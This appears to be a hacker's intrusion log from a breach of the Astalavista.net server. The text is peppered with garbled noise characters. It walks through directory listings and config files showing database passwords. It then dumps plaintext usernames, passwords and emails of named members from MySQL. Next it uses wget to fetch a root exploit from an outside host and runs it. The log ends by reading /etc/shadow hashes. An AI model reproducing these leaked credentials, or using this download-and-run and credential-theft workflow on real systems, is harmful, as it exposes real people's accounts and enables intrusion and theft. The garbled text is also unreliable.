; P* m* K2 w. |5 zdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
' k7 B' U' D) Z! b: Xdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
3 B! w0 G. d: a4 I) zdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql6 A. i" X e! b2 { `6 S# x, l# f4 S: k
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com+ |8 C/ u0 j) T* @% j* Z
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend T: s0 _! ` k( v! {2 n
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
5 T9 s5 Y6 j7 [* z-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
% L6 @ n# t- q) e1 m" t0 a$ |drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config. e, D% W& \8 A- H! a: }! L
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron+ `# n9 @6 w! [8 q3 h! x
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
/ y2 G$ L. g$ ?9 k-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
. b8 `4 k) Q" ~/ o-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico: x j) J2 B0 a) W0 g
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed9 C, }/ Y3 Q# W* A+ U
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
4 X: u$ h% w8 V# f& S6 u-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess+ |/ K Y) c# V+ @7 y
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess; t* u3 G, [/ J
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
' }- J) n6 k* s& i4 b' Y4 ?-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
* Z J2 p/ K" x9 v-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php. x& F$ t8 s. P* P! {
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php8 Q. ^+ ]: ~1 Y
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
. r0 }. k# f2 q6 m' \drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc6 C T, ^0 Z0 |) i: T
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
% b6 ]. _+ Z% q) p9 l! q. Q4 Wdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib6 m% r+ M z, B' ?5 _3 X* l1 \
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
( m3 |" e' h; B# D9 @/ r# g' Ndrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member: ]6 X3 W/ R# B+ E# a H
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata- m* y- O7 K* ~
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new& d; e, i4 v$ U& F) v
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
* O# E9 s# J3 Z0 @2 [# p$ a; Z. mdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
0 F$ F2 ?3 r* H6 C/ t7 d-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
1 \7 t, m( t6 T, q8 Z0 h- N0 Odrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss2 E& ] p/ T. u1 D! e/ P# a: |
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources2 F# U9 Z7 i$ @" p3 i% H
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com1 _5 [9 w/ M5 H
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
/ h6 d& s9 X7 g ~: odrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
% v# ~9 j. Z% T( O7 r; X8 P4 Vdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl7 R3 N$ J. @/ s1 X" {% r# K
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2: ?0 n! B; J7 `! X
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% z# w. F& c2 S3 J: u-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
# ?# h% ]' d) H' Edrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
9 u* U7 K' `/ I( b; q$ Q
- u" H, L2 R' L% s* \sh-3.2$ head -20 index.php
) x3 s8 }7 B6 K1 V% F3 Y1 ~<?PHP6 [8 m Q. L# S( G
/**
; v. E- }, j* {6 w* Mainfile (external) for astalavistaNET v2.0
' h- ~; S3 E! @ ~9 k3 |7 m*
4 g+ c* ^' _0 P3 W4 k4 u* @copyright Astalavista IT Engineering GmbH
' j9 |, X Q$ T5 g* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>" S8 U. b6 o. d. O
* @version 1.0% O' ?' R( c+ H% e) s+ d
*/
, T/ I$ A- u+ T7 ]
$ G" l. E8 V+ J" `- R4 g if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {0 u/ J- H# h# r' Q( [" J9 R
$dontStartSession = false;( w y/ x' i% s/ j2 n6 Y( E9 |
} else {
# [8 d% J! J4 I $dontStartSession = true;
/ ^, C+ E& R/ d4 {1 z7 \1 C }
. s3 _& Y1 }+ q/ M: G, q require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);8 J' {4 ^. ^. }, u
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
. u0 g. m3 y7 w8 e$ ]" I b8 b require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
9 d/ v `" `4 i: S; G* \9 b' ? require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);* x4 d) J7 w" r
; }; `0 G7 q" T
sh-3.2$ cd config9 G5 W- d+ w5 D
sh-3.2$ ls -la
" B4 M/ O% k3 H# D/ d7 T8 Ctotal 32
- l) A# F( {0 k {6 i- m1 D# F( P8 qdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
+ A& Z/ I$ \( ?1 D0 ?: O& V& ?drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; j( W9 e8 p$ D# d5 H
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
) m2 F' Q0 h# b-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
( ?4 b& c' M5 Y5 d6 `3 X-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php, S! W% C X1 z' c7 V" b
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php- K! ?/ t- P& O. X0 L" @
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
4 K( t% w' q. K6 e8 k) [8 ^7 i2 k$ o+ F, Z
sh-3.2$ cat com.conf.php
+ f) e7 c3 E& b% D x! x[snip]
9 q( P& G) }% a1 K2 v1 v% K7 ?//member-database
, w8 M7 a3 @6 ?$ ?, S. ]$_CONFIG['db_mem_server'] = ‘localhost’;
9 ]* J0 ]5 d9 `( \5 m9 M: f$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
+ P" @# {. q1 j* w' A' P$_CONFIG['db_mem_user'] = ‘astanet_db’;1 X% [2 V2 i& ?2 d) B- X! c4 B# \
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;$ v4 e1 P( A7 m- j/ {! x
$_CONFIG['db_mem_debug'] = false; //true or false
% _, s& ~, \$ V//ads-database( r$ z+ T% f& c9 R8 S. r! y' X
$_CONFIG['db_ads_server'] = ‘localhost’;
- \. f& ~4 \, c; i$_CONFIG['db_ads_database'] = ‘astanet_ads’;0 g0 A# o$ ?0 N: Q5 R/ P7 }
$_CONFIG['db_ads_user'] = ‘astanet_db’;! ~ ?% ]& O. g$ D6 ]
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;, b+ `7 b: D: A5 m( D# Z8 J+ c# B
$_CONFIG['db_ads_debug'] = false; //true or false8 z+ m& V3 r6 ~. s: m. O( G9 {
//rainbow-database! [& Y+ O e" N% I0 d1 J
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;* j4 u% A/ q$ r
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
0 b8 d$ a7 y+ x8 Q p7 F$_CONFIG['db_rainbow_user'] = ‘dinu’;
. }- J; O- S( U+ P, i5 N$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
3 B! b) x( m5 M- G$_CONFIG['db_rainbow_debug'] = false; //true or false
8 w" `% O# ^5 k' h" N//mailing lists database, r% ~/ v) I S/ U
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;$ z; V( B Z1 L% ~+ @( ?
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
' U' v$ H" l8 D9 e$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;; p. Y7 O8 w/ e% o6 k
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
4 u. ]" \& t' _. k" e' U H( J$_CONFIG['db_mailing_lists_debug'] = false; //true or false
. ]5 M: ~& v0 X& t, } W# C//paypal3 C( { Z/ n K3 t) Y) @& r4 Z: o
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;7 U' {* V& G. P$ B
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;9 s6 [) g+ {: ]9 L8 ~ E: p
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;* Z0 ?3 I4 q3 g; v" l9 R1 W3 R, b
$_CONFIG['sub_pp_noship'] = ‘1′;
( V, Q' H8 U, ^) }2 X( w% J' a. @$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;9 \6 I f+ W# z) u9 A( [6 p6 C% Q7 K
[snip]
4 R1 J; ?( p. o" s- j S
2 P4 A6 G, I+ z2 d1 {" d6 Hsh-3.2$ cd ..
( @5 F/ \. v; p' k9 hsh-3.2$ cd member
% E7 n/ H; y3 A6 ?sh-3.2$ ls -la0 X/ t- }2 O2 Z- }) H
total 20
/ ^( F! d2 G/ zdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
) \0 G$ i( k8 u- K1 B$ o3 h* a% ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., ^& I" M, g5 A1 [8 v) V5 Y/ x
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
& J# H5 m4 z" d( Q8 n7 G-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
0 e3 q8 v+ g9 Lsh-3.2$ cat .htaccess
6 p: \( B5 D: `SecFilterEngine off
- J$ m0 c5 w2 H
& I% F8 B9 e6 Z4 i7 Rsh-3.2$ cd ..
" c2 Y+ O1 s; }) [/ ?! |& @sh-3.2$ cd cron
/ t7 h' g( @7 q: Tsh-3.2$ ls -la
" B9 I0 \( s/ L. ^8 l& Etotal 168
' U2 x/ j" Q/ l z c Ydrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
" g+ W) G" m& z/ Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! j7 W5 M8 P. v/ I-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php* `4 C9 Q9 d5 P* o
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
! L ~. i; j" s* u+ i-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php: y% P# I; m* C# y* F& T
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php: R5 u4 T* ~9 M7 ?/ [
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php5 }+ x" l3 {8 j& u' k
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
! q( F4 ?2 Q& u5 a-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
& R- l% x; @4 B) C-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php! l X3 B* z2 Q$ j2 Z/ |9 @
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
1 m: A& v4 i" y6 V7 G8 J' Y5 Z-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php2 d3 t3 | l, G, p/ ^) V6 |
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
7 `3 P* l/ ?5 x7 j N8 c+ ~-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php% ^) g! K. l; d: M" B- h. g7 I
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
+ z! F$ R: p" V5 K-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php4 h$ M" T3 w# K" W0 Z
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
. U4 }; Y Y$ T* a) q0 F2 _" c-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php2 e5 N) Y8 v! m- p3 p# d
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
: j4 j& }8 m2 E-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
, P1 R# F, i' d: o& I- pdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
j1 r2 S1 i1 @' r: c1 ~8 V-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php; c3 L7 X$ N! r- }4 J, m/ n
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php, n, v4 I0 D: |9 x: W( B
( e0 N: B& j( a9 D8 |. I3 Y, o
sh-3.2$ cd .. ^3 c& n; | m% s& }) v! ~
sh-3.2$ cd _007
2 \* v# A3 s' F+ H; I5 A9 y, J2 rsh-3.2$ ls -la
. D+ i1 C# S( ?/ qtotal 24 m$ W$ z+ X1 k4 w
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
2 P9 L) X* T4 g Rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
* z `/ t' ], B1 N$ s* A1 e S% R-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess2 `5 g1 @- c% U9 ?0 D
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php( V5 ], N t% K
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
" Z+ w6 `# A7 E/ Jdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap9 t- u. [2 g8 f' a3 Z6 \
; k+ ]+ y) y( x5 m2 d* }$ Msh-3.2$ cat .htaccess
5 ~3 P0 M: i# Q4 R) SauthType Basic5 r$ j( S0 v3 _$ W0 ^( V
authName Admin0 s8 P# x0 g8 B R
authUserFile /home/astanet/auth/.htadm_pwd9 @2 {* `0 o1 E7 t& z+ S& I: ]6 g
require valid-user
[! C& v, F+ l
{! t3 r6 t! S2 v( V5 `8 |- Msh-3.2$ cat /home/astanet/auth/.htadm_pwd8 X0 X0 P$ k% W
admin2net:CR0bl65MwhfT! D' F; V: O% i
" \/ E' j9 _+ o- C6 u6 c: Y2 Rsh-3.2$ mysql -u astanet_db -p" S& K' M6 [8 i9 B$ e+ T
Enter password:, C# I4 V& b; b* h
Welcome to the MySQL monitor. Commands end with ; or \g.
& b- r5 h; b( \3 i+ G" U% {Your MySQL connection id is 275153
) }) r9 i* P. j9 h7 F$ M7 _Server version: 5.0.45-community-log MySQL Community Edition (GPL)
' {$ ?5 V/ r0 K0 O! n) y4 t$ n0 `8 B& ]3 z; o: k
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- O! w, g- k+ B
0 x# J: R* j' j+ ~( ^! Dmysql> show databases;6 j$ }7 [- y. _1 R1 J9 ~; C9 w+ W
+———————–+
" |2 Y4 F: y9 L1 c1 ~1 a0 E5 }& O( }| Database |8 O2 w1 V" [& a" h# Y) }8 T8 y7 J
+———————–++ y3 Q% G9 a# O
| information_schema |
: e8 l( O( U% C1 P, P X$ D| astanet_ads |( W' H- e& g& T" a# Q3 ^
| astanet_mailing_lists |
* t. k6 i: @ ^+ z3 i& b| astanet_mediawiki |: W2 {* n# Y. l/ `9 v, E
| astanet_membersystem |
: z9 S& y l' m- x; |' r| test |: V- {! ^& P- h* L) B
+———————–+
$ m' q8 J9 X$ W6 K6 rows in set (0.00 sec)
5 Y' S# ]5 k1 e u+ N6 l; @& e' f2 x \4 a7 y% E
mysql> use astanet_membersystem
! n+ D3 k% q0 D4 e% A1 PDatabase changed
2 F9 N' z( p% K: H5 M, @mysql> show tables;
7 q4 t0 |/ F. m- }5 B6 q+———————————–+0 [ B. f- t. N. }& G- i0 R- c4 m
| Tables_in_astanet_membersystem |0 L) m) T$ M0 [" z" v; K9 w
+———————————–+ I3 S# J& v0 h% f
| blacklist_categories |8 Q, z7 ~: m* j' m
| blacklist_content |$ o+ b1 B, S" r4 K
| blacklist_levels |- ^# z/ @' q! k$ p4 \
| blacklist_mcset |
2 x6 v) K. |$ k; v% P| dir_categories |: E0 M* g$ f! ]/ I. y3 D1 d
| dir_comments |3 X- G6 H( e) j0 E: d! y
| dir_links |: R/ \" }2 G2 ]4 c3 y) [/ O
| dir_temp |9 Z; F/ `5 n3 [
| dir_votes |
l% q* r2 @( u| documents |. s+ u1 S6 c3 m7 J
| documents_categories |
( D' v" y d1 j7 u# s2 A| email_content |6 e; A w) ] L) l8 X6 s" i5 D
| email_settings |3 i( d; t {" P* b2 Q
| exploits |0 L! V5 `# O2 M& {( o- D
| exploits_categories |8 [0 _1 ~7 ~7 U) t$ n' b
| exploittree_categories |) H U2 Y+ B# J" b! U4 |0 t
| exploittree_exploits |
6 P1 C3 S' b5 j; f$ g! [| home_values |; H5 ^1 E( U# T" a; A1 K; k
| iso_countries |( x# B7 T/ {$ A1 J
| links_categories |
5 Z$ W: b3 I& A" Y- n# R| links_records |8 L+ ]4 x5 _5 I2 u
| links_unauth |
( i3 z' y( h( }7 E& q8 g| links_votes |
4 u6 l+ b# Y& {& X/ F9 n| log |
9 `- Z- A( @1 J. s6 V1 n| news_categories |
" \7 J8 W5 I, M| news_comments |
B7 E# x% o$ J| news_emoticons |
$ ~; Q! p' f: ^! V| news_latest |
+ V6 u R* k( }$ p+ v! k| news_messages |) v, t6 l9 s6 G- n/ T4 E- _$ K
| news_statistics |
' c- ?: ?7 c! G3 D! k& [( L| news_votes |) }8 |2 y9 s9 `+ _5 W
| prices_content |
; q' s# t7 o1 I/ O# J' n- T2 r* m( f| prices_offers |5 N- J# U; U* i3 ^# F/ f/ b$ t
| rss_settings |7 |& R* _9 l% w/ [. B" N8 z
| sessions |1 ^3 W) h2 X" h1 W/ l. t
| stats_signups |* k1 y6 S' v9 N+ a
| u2u2 |4 p! k$ H( M. T
| u2u_contact |3 j) T! f' A& A7 f0 @, d* h4 u$ F
| u2u_settings |
1 D9 H4 k I! E" x# b2 g) || user_keywords_selected_categories |; j; y3 } w9 _& q2 ?
| users |
# Z; M$ \$ L* F7 N# P* a$ `| users_ipn_test |; c. T. L9 N4 {+ t9 F) M
| users_keyword_values |# D# F0 ]4 Y0 w$ o! p
| users_profile |
# z% ~0 ^/ H, O& c, p) g5 y| users_temp |- V, N- s+ Q: S3 k2 ?9 Y1 C' i! G+ j8 O
| users_upgrade |
: b- X; S! U. U `2 P" ~) T+———————————–+
2 N. @4 B' U) A$ j3 J8 r' }: K46 rows in set (0.00 sec)
, q) ]- d" H. |9 R) s
( n, O% v, T7 R2 cmysql> describe users;
- L! @: V* q) g5 k+————————–+————————————–+——+—–+———————+—————-+
3 _ e; K5 t* v& ^, X| Field | Type | Null | Key | Default | Extra |
& ^6 ]8 E' r* X- x0 v+————————–+————————————–+——+—–+———————+—————-+
% K- H6 E- ?- {; b| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
8 h% n3 W. A9 d' [| user | varchar(50) | NO | | | |# k/ i+ ~8 |% d7 ~' X
| nickname | varchar(30) | NO | MUL | anonymous | |4 e" b! r5 A* t: F N% Z
| password | varchar(30) | NO | | | |9 o0 z& c! B8 J5 i# m& {. i
| userlevel | tinyint(3) | YES | MUL | NULL | |
, B. A, \- m5 K- j! C) g| exp | int(8) unsigned | NO | | 0 | |$ h: C- K2 V& T8 N
| email | varchar(50) | NO | | | |
* v6 N9 d$ d7 G| ip | varchar(15) | NO | | 0 | |3 g$ W; W5 |. Q: K' O6 l8 \) e/ e z
| proxy | set(’0′,’1′) | NO | | 0 | |1 B4 a3 B4 {2 g
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
5 }$ C3 w% G! K: t0 v0 ^, R7 U| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
+ J0 j; {# m2 f4 y9 I& Y) k| anz_in | tinyint(1) | NO | | -1 | |9 r1 c3 v& M- n6 b% F: R
| status | tinyint(1) unsigned | NO | | 0 | |) b+ w6 V1 a C
| checked | set(’0′,’1′,’2′) | NO | | 0 | |. j/ B9 c- f) q7 D0 u
| freemember | set(’0′,’1′) | NO | | 0 | |
! ]; s, w9 X& c( q" ]| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
0 X3 f4 ^6 O5 L0 J8 p| lang | tinytext | NO | | | |
' a* T2 w% O& A0 K3 o* Q| adid | smallint(6) | NO | | 0 | |
! B5 K! g4 {& g* ?| pp_txn_id | varchar(255) | YES | | NULL | |
2 f6 i5 Y+ ?4 t| cnb_transaction_id | varchar(255) | YES | | NULL | |
+ ?6 E% K+ M5 m2 L7 v| cnb_order_id | varchar(255) | YES | | NULL | |
) L% \1 }9 `* N! y% c| cnb_user_id | int(11) | YES | | 0 | |
; i, _5 N. L5 ~) t+————————–+————————————–+——+—–+———————+—————-+; t8 W, A @9 l, J a8 {+ v4 L
22 rows in set (0.01 sec)' B) l6 ]0 n- G- i* m! g, [' |
! m, l5 J6 _0 v( H( B8 d% [1 g6 Z3 m
mysql> select count(*) as skids from users;
# t4 s/ v# e' n, e, V+——-+* m4 A5 |: s' F) e& l
| skids |) e# C! y& q6 C _; j* I$ ?& O
+——-+
. K2 _/ [0 Q/ [6 U| 25199 |
$ ?6 |+ c {) p# i0 D( r7 X+ b+——-+
# n0 i l9 t1 |6 V/ f1 p1 row in set (0.00 sec)
2 V" n1 A8 X0 O6 Q, i x$ r0 I# O' c+ W
mysql> select user,nickname,password,email from users where userlevel = 1;( m# L3 M2 d' A: G/ V( Q
+————————–+———————-+——————+———————————–+' x. e% j. L( a9 u/ z; ~. g' s
| user | nickname | password | email |
) s% i* y$ a$ p$ o7 W6 s+————————–+———————-+——————+———————————–+& T1 U- X* f) T5 v! `7 N) r9 J
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
S# J9 h; C# t9 s+ c$ X* E" U| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
8 I# R* L* \3 Q5 W/ F3 M3 ]3 W| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
( f, S+ ?: l0 c5 d0 E| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |" j" h6 d' N+ J3 K- `
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |3 U' D* e( `) H# K
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |/ O. o0 x( B# _; N) d& v8 Y" ~
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
" L" x7 f- m2 l/ y J- R! Q| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |& v5 Q3 _5 W$ Z/ A
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
: d1 c4 c0 T$ l6 }| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |1 K4 r9 H9 K6 e" M5 d: e, u
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |5 j6 j1 h5 U# ~* @; F0 ]6 h+ U
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |0 D; `5 A8 G: J1 `# E- q
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
- x8 p/ g0 x4 S0 o7 {/ v- c; O| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
! l" y. D% y: J| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
6 U( ?- J R) c) v I$ q( ?9 ~| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch | d, o: }# K! v- W+ J% q! v8 o
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |4 d! l0 \* p6 H5 |# | i2 y
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
6 ^! i7 x" o- y! m6 Q. N9 T+ f| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |* P/ E" t; v' I' Q
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |# a5 u. [0 ?- k% ?0 \: S6 V
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |9 Q' E$ Q' E' z; S( m% D1 p
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
@# N. Z3 W* Z7 _, L0 E| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |* t3 [2 T( N, G/ _
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |2 Z; _: h9 T% G8 p6 I' K
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |/ |" w1 s8 Z% h- Y
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
3 ^4 W, u* K9 W; O7 Q" u- ]9 A$ s0 h| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |: e' _- h, l9 v1 w
+————————–+———————-+——————+———————————–+
) @" f* }7 \+ N, h0 [27 rows in set (0.00 sec)% i' w& j$ g1 ~
$ S. A4 K# O6 X! Dmysql> exit;/ Q/ e5 x4 i" D& [ k5 x
Bye
, E; B" B8 f7 r( W
) k6 j5 j7 }4 k4 J[~] plaintext passwords? yes,
9 O: G; n+ j' wThose so called “security professionals” who charge you $6.66 / month to
U5 v/ Z8 ]* _0 pregister at their hack-proof portal, save your passwords in plaintext…0 [5 h! y, U5 J. J
brilliant!
7 }9 t: X2 d# u$ ^1 C8 @" N& X9 c4 }) c1 H# y, u* O& o4 S
[~] This been fun but we want more.
8 i2 V' W9 j# w( B j2 {# w* W5 g2 r/ F! y h: L% C9 ]0 |
sh-3.2$ uname -a
7 O" q3 m8 c' D+ R' N2 DLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' v' {: {- ~7 Ish-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ R" c0 n: j+ f; m* I–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
, o7 I5 u" i0 w7 JResolving anti.sec.labs… 13.33.33.37! r/ G/ @1 s* K$ f. A( e
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
) U9 l6 v* O {1 ?% g- @0 ]( H1 QHTTP request sent, awaiting response… 200 OK
0 A0 i9 }% _+ x1 {: _6 ALength: 18200 (18K) [text/plain] z7 ^2 m- ?8 A% p J" W
Saving to: `g0troot’9 V, ]& \. M9 M9 V9 r: o7 ?
* i1 i3 ?% [ r- F( g
100%[=========================================================================================================================================>] 18,200 58.6K/s in
# N$ H% B1 j& i4 w$ ^7 N0.3s! C$ H! T: _. w ^4 x
4 a! Y" I3 B2 n# s; _' ? f4 ~" a18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
, w b1 e0 o- e- ^/ z- g1 J2 N
. L Q& K- b% ~$ _sh-3.2$ ./g0troot -i x86_64
: M/ M# M h3 P[+] g0troot - anti.sec.labs
4 Q6 Q& ~5 `: I* V* z+ u7 V[+] Target: 2.6.18-128.1.10.el5
* P1 k3 D4 h2 @: p) V. p[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
# G7 _* m% l, Q5 h
2 O& s# _8 }: u) n. Q6 n l[+] r00tr00t
( s6 s! u- V1 _. l! n[~] Executing shell…+ a. T# [8 \% Y' s5 O
: Q% I8 Z7 l7 R" D
sh-3.2# id1 Q4 b5 N' ^/ Z1 [7 r6 S- k2 ^
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
' _+ c, u. i: u
) e1 J/ n; V& ] |9 `" s+ msh-3.2# cat /etc/shadow
5 R* J5 c/ Y# i$ A: J9 E& e: Uroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
* L, X W# t* b4 B[snip]
G5 ], ?, v2 o7 R$ p2 Badmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::3 k: k) Z4 o; ~/ v" ?
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::% l$ K& G7 Z. K, D& ]) B% o) H7 T0 l& `
